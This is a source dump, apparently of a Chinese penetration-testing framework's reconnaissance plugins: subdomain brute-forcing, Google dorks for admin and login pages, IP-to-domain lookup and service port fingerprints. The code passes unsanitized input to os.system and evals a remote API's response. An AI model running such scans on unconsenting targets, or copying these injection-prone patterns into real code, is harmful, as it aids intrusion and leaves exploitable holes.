16 | self.wds = ['inurl:admin|login|register|upload|editor', '后台|系统']
17 | # print('Please wait a few time ...')
18 | self.STOP = 50 # 谷歌最多爬取20个结果
19 | self.save_fold_path = save_fold_path # \result\0ca9b508e31f
20 | self.googleSubdomains = []
21 |
22 | def run(self):
23 | for wd in self.wds:
24 | with open('{}/googleSpider.txt'.format(self.save_fold_path), 'at') as f:
25 | key = 'site:*.{} {}'.format(self.domain, wd)
26 | f.writelines('[+] {} :\n'.format(key))
27 | print('\t[+] google search -> [{}]'.format(key))
28 | for each_result in search(key):
29 | f.writelines('{}\n'.format(each_result))
30 | parseRet = urlparse(each_result)
31 | subdomain = parseRet.netloc
32 | if self.domain in subdomain and subdomain not in self.googleSubdomains:
33 | self.googleSubdomains.append(subdomain)
34 |
35 | return self.googleSubdomains
36 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/Google/googlesearch/user_agents.txt.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Spider/Google/googlesearch/user_agents.txt.gz
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Spider/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Spider/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Sublist3r/setup.py:
--------------------------------------------------------------------------------
1 | from setuptools import setup, find_packages
2 |
3 | setup(
4 | name='Sublist3r',
5 | version='1.0',
6 | python_requires='>=2.7',
7 | install_requires=['dnspython', 'requests', 'argparse; python_version==\'2.7\''],
8 | packages=find_packages()+['.'],
9 | include_package_data=True,
10 | url='https://github.com/aboul3la/Sublist3r',
11 | license='GPL-2.0',
12 | description='Subdomains enumeration tool for penetration testers',
13 | classifiers=[
14 | 'Development Status :: 5 - Production/Stable',
15 | 'Environment :: Console',
16 | 'Intended Audience :: Information Technology',
17 | 'Intended Audience :: System Administrators',
18 | 'Intended Audience :: Telecommunications Industry',
19 | 'License :: OSI Approved :: GNU General Public License v2',
20 | 'Operating System :: POSIX :: Linux',
21 | 'Programming Language :: Python',
22 | 'Programming Language :: Python :: 2',
23 | 'Programming Language :: Python :: 3',
24 | 'Programming Language :: Python :: 2.7',
25 | 'Programming Language :: Python :: 3.4',
26 | 'Programming Language :: Python :: 3.5',
27 | 'Programming Language :: Python :: 3.6',
28 | 'Topic :: Security',
29 | ],
30 | keywords='subdomain dns detection',
31 | entry_points={
32 | 'console_scripts': [
33 | 'sublist3r = sublist3r:interactive',
34 | ],
35 | },
36 | )
37 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/Sublist3r/subbrute/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/Sublist3r/subbrute/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/beian2NewDomain/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/beian2NewDomain/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/githubSubdomains/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/githubSubdomains/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/hostCollide/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/hostCollide/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ip2domain/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/ip2domain/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ip2domain/getIp2Domain.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
3 | # 禁用安全请求警告
4 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
5 |
6 | from queue import Queue
7 | from threading import Thread
8 | from IPy import IP
9 | import re
10 |
11 | headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
12 | TIMEOUT = 10
13 | cmp = re.compile(r'{"domain":"http:\\/\\/(.*?)","title":".*?"}') # 正则匹配规则
14 |
15 | def ip2domain(allTargets_Queue, domain, _domain, ip2domain_dict, num, newDomains):
16 | while not allTargets_Queue.empty():
17 | ip = allTargets_Queue.get()
18 | url = r'http://api.webscan.cc/?action=query&ip={}'.format(ip)
19 | print(url)
20 | try:
21 | res = requests.get(url=url, headers=headers, timeout=TIMEOUT, verify=False)
22 | text = res.text
23 | if text != 'null':
24 | results = eval(text)
25 | domains = []
26 | for each in results:
27 | domains.append(each['domain'])
28 | # domains = cmp.findall(text)
29 | if domains:
30 | ip2domain_dict[ip] = domains
31 | print('[{}] {}'.format(ip, domains))
32 | if domain:
33 | for each in domains:
34 | if _domain in each and domain not in each and len(each) > 1:
35 | newDomains.append(each)
36 | except Exception as e:
37 | print('[error] ip2domain: {}'.format(e.args))
38 |
39 |
40 |
41 | def run_ip2domain(domain, allTargets_Queue):
42 | ip2domain_dict = {} # 字典,key为IP,value为归属地
43 | newDomains = []
44 | if domain: #
45 | _domain = domain.split('.')[0] # baidu
46 | else:
47 | _domain = None
48 |
49 | threads = []
50 | for num in range(50):
51 | t = Thread(target=ip2domain, args=(allTargets_Queue, domain, _domain, ip2domain_dict, num, newDomains))
52 | threads.append(t)
53 | t.start()
54 | for t in threads:
55 | t.join()
56 |
57 | return ip2domain_dict, list(set(newDomains))
58 |
59 |
60 | if __name__ == '__main__':
61 | domain = ''
62 | allTargets_Queue = Queue(-1)
63 | allTargets_Queue.put('')
64 | allTargets_Queue.put('')
65 | ip2domain_dict, _newDomains = run_ip2domain(domain, allTargets_Queue)
66 | # for ip in ip2domain_dict:
67 | # print('[{}] -> {}'.format(ip, ip2domain_dict[ip]))
68 |
69 | print(ip2domain_dict)
70 | subdomains = []
71 | for subdomain in ip2domain_dict.values():
72 | subdomains.extend(subdomain)
73 |
74 | setSubdomains = list(set(subdomains))
75 | print('[{}] {}'.format(len(setSubdomains), setSubdomains))
76 | print(_newDomains)
77 |
78 | #
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ipAddress/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/ipAddress/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ipAddress/getIpAddress.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
3 | # 禁用安全请求警告
4 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
5 |
6 | from queue import Queue
7 | from threading import Thread
8 | import json
9 | import re
10 |
11 | headers = {'user-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}
12 | TIMEOUT = 10
13 |
14 | def get_ip_address(ip_Queue, ip_address_dict, num):
15 | while not ip_Queue.empty():
16 | ip = ip_Queue.get()
17 | url = r'http://whois.pconline.com.cn/ipJson.jsp?ip={}&json=true'.format(ip)
18 | try:
19 | res = requests.get(url=url, headers=headers, timeout=TIMEOUT, verify=False)
20 | text = res.text
21 | json_text = json.loads(text)
22 | address = json_text['addr']
23 | ip_address_dict[ip] = address
24 | print('[{}] {}'.format(ip, address))
25 | except Exception as e:
26 | print('[error] get_ip_address: {}'.format(e.args))
27 |
28 |
29 |
30 | def run_getIpAddress(ip_list):
31 | ip_Queue = Queue(-1)
32 | ip_address_dict = {} # 字典,key为IP,value为归属地
33 |
34 | # 存到队列里
35 | for ip in ip_list:
36 | ip_Queue.put(ip)
37 |
38 | threads = []
39 | for num in range(50):
40 | t = Thread(target=get_ip_address, args=(ip_Queue, ip_address_dict, num))
41 | threads.append(t)
42 | t.start()
43 | for t in threads:
44 | t.join()
45 |
46 | return ip_address_dict
47 | # print(web_Titles)
48 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ksubdomain/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/ksubdomain/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ksubdomain/ksubdomain.py:
--------------------------------------------------------------------------------
1 | import os
2 |
3 |
4 | def run_ksubdomain(domain):
5 | ksubdomains = []
6 | ksubdomain_folder = './Plugins/infoGather/subdomain/ksubdomain'
7 | ksubdomain_file = '{}/{}.txt'.format(ksubdomain_folder, domain)
8 |
9 | os.system('chmod 777 ./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux')
10 | os.system('./Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux -d {} -o {}'.format(domain, ksubdomain_file))
11 | try:
12 | with open(ksubdomain_file, 'rt') as f:
13 | for each_line in f.readlines():
14 | each_line_split = each_line.split('=>')
15 | subdomain = each_line_split[0].strip() # 子域名
16 | ksubdomains.append(subdomain)
17 |
18 | os.remove(ksubdomain_file) # 删除临时文件
19 | except Exception as e:
20 | ksubdomains = []
21 |
22 | return list(set(ksubdomains))
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/ksubdomain/ksubdomain_linux
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/.gitignore:
--------------------------------------------------------------------------------
1 | *.py[cod]
2 | .idea/*
3 | tmp/
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/1.txt:
--------------------------------------------------------------------------------
1 | baidu.com
2 | taobao.com
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/README.md:
--------------------------------------------------------------------------------
1 | subDomainsBrute 1.1
2 | ======
3 |
4 | A fast sub domain brute tool for pentesters.
5 |
6 | 本工具用于渗透测试目标域名收集。高并发DNS暴力枚举,发现其他工具无法探测到的域名, 如Google,aizhan,fofa。
7 |
8 | You can get older versions via [https://github.com/lijiejie/subDomainsBrute/releases](https://github.com/lijiejie/subDomainsBrute/releases)
9 |
10 |
11 | ## Change Log
12 | * [2018-02-06]
13 | * 添加多进程支持。 多进程 + 协程,提升扫描效率。
14 | * 预处理了原字典中的占位符,提升扫描效率
15 | * [2017-06-03] Bug fix: normal_lines remove deep copy issus, thanks @BlueIce
16 | * [2017-05-04] 使用协程替代多线程; 使用了优化级队列,来减小队列的长度; 优化占位符支持
17 |
18 |
19 | ## Dependencies ##
20 | > pip install dnspython gevent
21 |
22 |
23 | ## Usage ##
24 | Usage: subDomainsBrute.py [options] target.com
25 | Options:
26 | --version show program's version number and exit
27 | -h, --help show this help message and exit
28 | -f FILE File contains new line delimited subs, default is
29 | subnames.txt.
30 | --full Full scan, NAMES FILE subnames_full.txt will be used
31 | to brute
32 | -i, --ignore-intranet
33 | Ignore domains pointed to private IPs
34 | -t THREADS, --threads=THREADS
35 | Num of scan threads, 200 by default
36 | -p PROCESS, --process=PROCESS
37 | Num of scan Process, 6 by default
38 | -o OUTPUT, --output=OUTPUT
39 | Output file name. default is {target}.txt
40 |
41 |
42 | ## Screenshot ##
43 |
44 | 如图,使用默认字典,扫描qq.com,发现去重后域名2319个,耗时约298秒。
45 |
46 | 
47 |
48 | Output could be like: [https://github.com/lijiejie/subDomainsBrute/blob/master/dict/sample_qq.com.txt](https://github.com/lijiejie/subDomainsBrute/blob/master/dict/sample_qq.com.txt)
49 |
50 | From [http://www.lijiejie.com](http://www.lijiejie.com)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/lijiejie/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/lijiejie/lib/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/lib/cmdline.py:
--------------------------------------------------------------------------------
1 | import optparse
2 | import sys
3 |
4 |
5 | def parse_args():
6 | parser = optparse.OptionParser('usage: %prog [options] target.com',
7 | version="%prog 1.1")
8 | parser.add_option('-f', dest='file', default='subnames.txt',
9 | help='File contains new line delimited subs, default is subnames.txt.')
10 | parser.add_option('--full', dest='full_scan', default=False, action='store_true',
11 | help='Full scan, NAMES FILE subnames_full.txt will be used to brute')
12 | parser.add_option('-i', '--ignore-intranet', dest='i', default=False, action='store_true',
13 | help='Ignore domains pointed to private IPs')
14 | parser.add_option('-t', '--threads', dest='threads', default=200, type=int,
15 | help='Num of scan threads, 200 by default')
16 | parser.add_option('-p', '--process', dest='process', default=6, type=int,
17 | help='Num of scan Process, 6 by default')
18 | parser.add_option('-o', '--output', dest='output', default=None,
19 | type='string', help='Output file name. default is {target}.txt')
20 |
21 | (options, args) = parser.parse_args()
22 | if len(args) < 1:
23 | parser.print_help()
24 | sys.exit(0)
25 | return options, args
26 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/lijiejie/lib/consle_width.py:
--------------------------------------------------------------------------------
1 | """ getTerminalSize()
2 | - get width and height of console
3 | - works on linux,os x,windows,cygwin(windows)
4 | """
5 |
6 | __all__ = ['getTerminalSize']
7 |
8 |
9 | def getTerminalSize():
10 | import platform
11 | current_os = platform.system()
12 | tuple_xy = None
13 | if current_os == 'Windows':
14 | tuple_xy = _getTerminalSize_windows()
15 | if tuple_xy is None:
16 | tuple_xy = _getTerminalSize_tput()
17 | # needed for window's python in cygwin's xterm!
18 | if current_os == 'Linux' or current_os == 'Darwin' or current_os.startswith('CYGWIN'):
19 | tuple_xy = _getTerminalSize_linux()
20 | if tuple_xy is None:
21 | tuple_xy = (80, 25) # default value
22 | return tuple_xy
23 |
24 |
25 | def _getTerminalSize_windows():
26 | res = None
27 | try:
28 | from ctypes import windll, create_string_buffer
29 |
30 | # stdin handle is -10
31 | # stdout handle is -11
32 | # stderr handle is -12
33 |
34 | h = windll.kernel32.GetStdHandle(-12)
35 | csbi = create_string_buffer(22)
36 | res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
37 | except:
38 | return None
39 | if res:
40 | import struct
41 | (bufx, bufy, curx, cury, wattr,
42 | left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
43 | sizex = right - left + 1
44 | sizey = bottom - top + 1
45 | return sizex, sizey
46 | else:
47 | return None
48 |
49 |
50 | def _getTerminalSize_tput():
51 | # get terminal width
52 | # src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
53 | try:
54 | import subprocess
55 | proc = subprocess.Popen(["tput", "cols"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
56 | output = proc.communicate(input=None)
57 | cols = int(output[0])
58 | proc = subprocess.Popen(["tput", "lines"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
59 | output = proc.communicate(input=None)
60 | rows = int(output[0])
61 | return (cols, rows)
62 | except:
63 | return None
64 |
65 |
66 | def _getTerminalSize_linux():
67 | def ioctl_GWINSZ(fd):
68 | try:
69 | import fcntl, termios, struct, os
70 | cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
71 | except:
72 | return None
73 | return cr
74 |
75 | cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
76 | if not cr:
77 | try:
78 | fd = os.open(os.ctermid(), os.O_RDONLY)
79 | cr = ioctl_GWINSZ(fd)
80 | os.close(fd)
81 | except:
82 | pass
83 | if not cr:
84 | try:
85 | env = os.environ
86 | cr = (env['LINES'], env['COLUMNS'])
87 | except:
88 | return None
89 | return int(cr[1]), int(cr[0])
90 |
91 |
92 | if __name__ == "__main__":
93 | sizex, sizey = getTerminalSize()
94 | print('width =', sizex, 'height =', sizey)
95 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/othersApiSubdomains/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/othersApiSubdomains/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/queryA/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/queryA/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/queryA/queryA.py:
--------------------------------------------------------------------------------
1 | # 查询子域名的A记录
2 | import re
3 | from queue import Queue
4 | from threading import Thread
5 | import dns
6 |
7 | def query_A(t_id, subtract_subdomains_queue, Subdomains_ips): # 查询A记录的IP
8 | while not subtract_subdomains_queue.empty():
9 | subdomain = subtract_subdomains_queue.get()
10 | # print('{}, '.format(subdomain), end='')
11 | try:
12 | dns_A_ips = [j for i in dns.resolver.query(subdomain, 'A').response.answer for j in i.items]
13 | ips = []
14 | for each_ip in dns_A_ips:
15 | each_ip = str(each_ip)
16 | if re.compile('^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$').match(each_ip): # 正则匹配是否是IP
17 | ips.append(str(each_ip))
18 | Subdomains_ips[subdomain] = ips
19 | except Exception as e:
20 | Subdomains_ips[subdomain] = []
21 |
22 | def run_queryA(Subdomains_ips, subdomains):
23 | query_A_threads = [] # 存放线程
24 | subtract_subdomains_queue = Queue(-1)
25 |
26 | for subdomain in subdomains:
27 | subtract_subdomains_queue.put(subdomain)
28 |
29 | # print('query A : ', end='')
30 |
31 |
32 | for t_id in range(50): # 对新增的子域名进行A记录查询获取IP
33 | t = Thread(target=query_A, args=(t_id, subtract_subdomains_queue, Subdomains_ips))
34 | query_A_threads.append(t)
35 | t.start()
36 | for t in query_A_threads:
37 | t.join()
38 |
39 | # print()
40 | return Subdomains_ips
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/scanPort/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/scanPort/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/scanPort/demo.py:
--------------------------------------------------------------------------------
1 | import requests
2 |
3 | url = r'http://127.0.0.1:9080/'
4 | res = requests.get(url=url, timeout=10, verify=False)
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/scanPort/server_info.ini:
--------------------------------------------------------------------------------
1 | ftp|21|^220.*\n331|^220.*\n530|^220.*FTP|^220 .* Microsoft .* FTP
2 | ssh|22|^ssh-
3 | ldap|389|
4 | smb|445|
5 | rsync|873|^@RSYNCD|^@ERROR
6 | mssql|1433|
7 | oracle|1521|
8 | mysql|3306|^.\0\0\0.*?mysql|^.\0\0\0\n|.*?MariaDB server|mysql
9 | rdp|3389|
10 | svn|3690|
11 | PostgreSql|5432|
12 | vnc|5800|^RFB
13 | vnc|5900|^RFB
14 | redis|6379|-ERR|^\$\d+\r\nredis_version
15 | Elasticsearch|9200|
16 | Elasticsearch|9300|
17 | memcached|11211|
18 | mongodb|27017|
19 | mongodb|27018|
20 | weblogic|7001|
21 | Zookeeper|2181|
22 | Zookeeper|2171|
23 | Memcache|11211|
24 | Hadoop|50070|
25 | couchdb|9584|
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomain3/Bruteapi.py:
--------------------------------------------------------------------------------
1 | #encoding=utf8
2 | from brutedns import Brutedomain
3 |
4 |
5 | class cmd_args:
6 | def __init__(self):
7 | self.domain=''
8 | self.speed=''
9 | self.level=''
10 | self.cdn = ''
11 | self.sub_dict=''
12 | self.next_sub_dict =''
13 | self.default_dns = ''
14 | self.other_result=''
15 |
16 | class Brute_subdomain_api:
17 | def run(self,domain, speed, level,default_dns,cdn,sub_dict,next_sub_dict,other_file):
18 | cmd_args.domain = domain
19 | cmd_args.speed = speed
20 | cmd_args.level = level
21 | cmd_args.sub_file = sub_dict
22 | cmd_args.default_dns= default_dns
23 | cmd_args.next_sub_file = next_sub_dict
24 | cmd_args.other_file = other_file
25 | cmd_args.cname='y'
26 | brute = Brutedomain(cmd_args)
27 | brute.run()
28 | return brute.found_count
29 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomain3/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/subdomain3/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomain3/config/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/subdomain3/config/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomain3/config/config.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 |
3 | # 在爆破中,如果一个无效ip多次出现,可以将IP加入到下列表中,程序会在爆破中过滤。
4 | waiting_fliter_ip = [
5 | '1.1.1.1',
6 | '127.0.0.1',
7 | '0.0.0.0',
8 | '0.0.0.1'
9 | ]
10 |
11 | # 速度分为三种模式,可以根据以下配置进行调节
12 |
13 | # high
14 | high_segment_num = 800 # 程序采用逐量放到内存爆破,以减少内存占用。该设置会改变每次的读取量
15 |
16 | # medium
17 | medium_segment_num = 550
18 |
19 | # low
20 | low_segment_num = 350
21 |
22 | # 设置一个ip出现的最多次数,后续出现将被丢弃
23 | ip_max_count = 30
24 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/subdomainInterface/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/infoGather/subdomain/subdomainInterface/__init__.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/template/multiThreading.py:
--------------------------------------------------------------------------------
1 | # -*- coding:utf-8 -*-
2 | # 多线程框架模板
3 |
4 | from Wappalyzer import Wappalyzer, WebPage
5 | from threading import Thread
6 | import sys
7 | from Queue import Queue
8 | from traceback import print_exc
9 | import warnings
10 |
11 | warnings.filterwarnings('ignore')
12 | import re
13 | from sys import version_info
14 | import requests
15 | from requests.packages.urllib3.exceptions import InsecureRequestWarning
16 |
17 | # 禁用安全请求警告
18 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
19 |
20 | PY2, PY3 = (True, False) if version_info[0] == 2 else (False, True)
21 | if PY2:
22 | from Queue import Queue
23 | from urlparse import urlparse
24 | else:
25 | from queue import Queue
26 | from urllib.parse import urlparse
27 |
28 |
29 | # 友链爬取
30 | class webDetect:
31 | def __init__(self, Hosts, save_fold_path, fileName):
32 | self.Hosts = Hosts # 域名或者IP
33 | self.save_fold_path = save_fold_path
34 | self.fileName = fileName
35 |
36 | self.headers = {
37 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
38 | self.TIMEOUT = 10
39 | self.threadsNum = 100
40 | self.queueTasks = Queue(-1) # 存放域名或IP的任务队列
41 | self.port = [21, 22, 23, 25, 53, 80, 110, 139, 143, 389, 443, 445, 465, 873, 993, 995, 1080, 1723, 1433, 1521,
42 | 3306, 3389, 3690, 5432, 5800, 5900, 6379, 7001, 81, 88, 89, 888, 880, 8000, 8001, 8080, 8081, 8888,
43 | 9200, 9300, 9080, 9999, 11211, 27017]
44 | self.allServerInfo = self.read_config('./scanPort/server_info.ini') # 读取端口服务的正则表达式
45 | self.TIMEOUT = 10 # socket的延时
46 | self.port_info = {}
47 | self.headers = {
48 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
49 | self.title_patten = re.compile('
(.*)?')
50 |
51 | def run(self):
52 | for host in self.Hosts:
53 | self.queueTasks.put(host)
54 |
55 | threads = []
56 | for i in range(1, self.threadsNum + 1):
57 | t = Thread(target=self.scan)
58 | threads.append(t)
59 | t.start()
60 | for t in threads:
61 | t.join()
62 |
63 | def scan(self):
64 | while not self.queueTasks.empty():
65 | queueTask = self.queueTasks.get()
66 | try:
67 | pass
68 | except Exception:
69 | pass
70 |
71 | def save(self, content):
72 | with open('{}/{}_ports.txt'.format(self.save_fold_path, self.fileName), 'at') as f:
73 | f.writelines('{}\n'.format(content))
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/.gitattributes:
--------------------------------------------------------------------------------
1 | # Set the default behavior, which is to have git automatically determine
2 | # whether a file is a text or binary, unless otherwise specified.
3 |
4 | * text=auto
5 |
6 | # Basic .gitattributes for a python repo.
7 |
8 | # Source files
9 | # ============
10 | *.pxd text diff=python
11 | *.py text diff=python
12 | *.py3 text diff=python
13 | *.pyw text diff=python
14 | *.pyx text diff=python
15 |
16 | # Binary files
17 | # ============
18 | *.db binary
19 | *.p binary
20 | *.pkl binary
21 | *.pyc binary
22 | *.pyd binary
23 | *.pyo binary
24 |
25 | # Note: .db, .p, and .pkl files are associated with the python modules
26 | # ``pickle``, ``dbm.*``, # ``shelve``, ``marshal``, ``anydbm``, & ``bsddb``
27 | # (among others).
28 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/.gitignore:
--------------------------------------------------------------------------------
1 | *.idea
2 | *.pyc
3 | *.sqlite
4 | *.html
5 | *.htm
6 | *.vscode
7 | *.xml
8 | debug_results.txt
9 | venv
10 | .mypy_cache
11 | .pytest_cache
12 | build/
13 | dist/
14 | .DS_Store
15 |
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/.lgtm.yml:
--------------------------------------------------------------------------------
1 | queries:
2 | - exclude: py/import-and-import-from
3 | - exclude: py/polluting-import
4 |
5 | extraction:
6 | python:
7 | python_setup:
8 | version: 3
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/.travis.yml:
--------------------------------------------------------------------------------
1 | dist: bionic
2 | language: python
3 | cache: pip
4 | matrix:
5 | allow_failures:
6 | - python: 'nightly'
7 | include:
8 | - python: 'nightly'
9 | env: TEST_SUITE=suite_3_9
10 |
11 | before_install:
12 | - pip install -r requirements/dev.txt
13 | install:
14 | - python setup.py test
15 | script:
16 | - python theHarvester.py -d apple.com -b baidu,bing,bufferoverun,certspotter,crtsh,dnsdumpster,dogpile,duckduckgo,exalead,linkedin,netcraft,intelx,threatcrowd,trello,twitter,virustotal,yahoo,rapiddns
17 | -l 200
18 | - pytest
19 | - flake8 . --count --show-source --statistics
20 | - mypy --pretty theHarvester/discovery/*.py
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM python:alpine3.11
2 | RUN mkdir /app
3 | WORKDIR /app
4 | COPY . /app
5 | RUN apk add --update build-base libffi-dev libxml2-dev libxslt-dev
6 | RUN pip3 install -r requirements.txt
7 | RUN chmod +x *.py
8 | ENTRYPOINT ["/app/theHarvester.py"]
--------------------------------------------------------------------------------
/Plugins/infoGather/subdomain/theHarvester/Pipfile:
--------------------------------------------------------------------------------
1 | [[source]]
2 | url = "https://pypi.python.org/simple"
3 | verify_ssl = true
4 | name = "pypi"
5 |
6 | [packages]
7 | aiodns = "==2.0.0"
8 | aiohttp = "==3.6.2"
9 | aiosqlite = "==0.13.0"
10 | beautifulsoup4 = "==4.9.1"
11 | dnspython = "==1.16.0"
12 | netaddr = "==0.7.19"
13 | plotly = "==4.7.1"
14 | PyYAML = "==5.3.1"
15 | requests = "==2.23.0"
16 | retrying = "==1.3.3"
17 | shodan = "==1.23.0"
18 | texttable = "==1.6.2"
19 | lxml = "==4.5.1"
20 | uvloop = "==0.14.0"
21 | certifi = "==2020.4.5.1"
22 |
23 | [dev-packages]
24 | flake8 = "==3.8.2"
25 | mypy = "==0.770"
26 | mypy-extensions = "==0.4.3"
27 | pyflakes = "==2.2.0"
28 | pytest =" ==5.4.2"
29 | pytest-asyncio = "==0.12.0"
--------------------------------------------------------------------------------
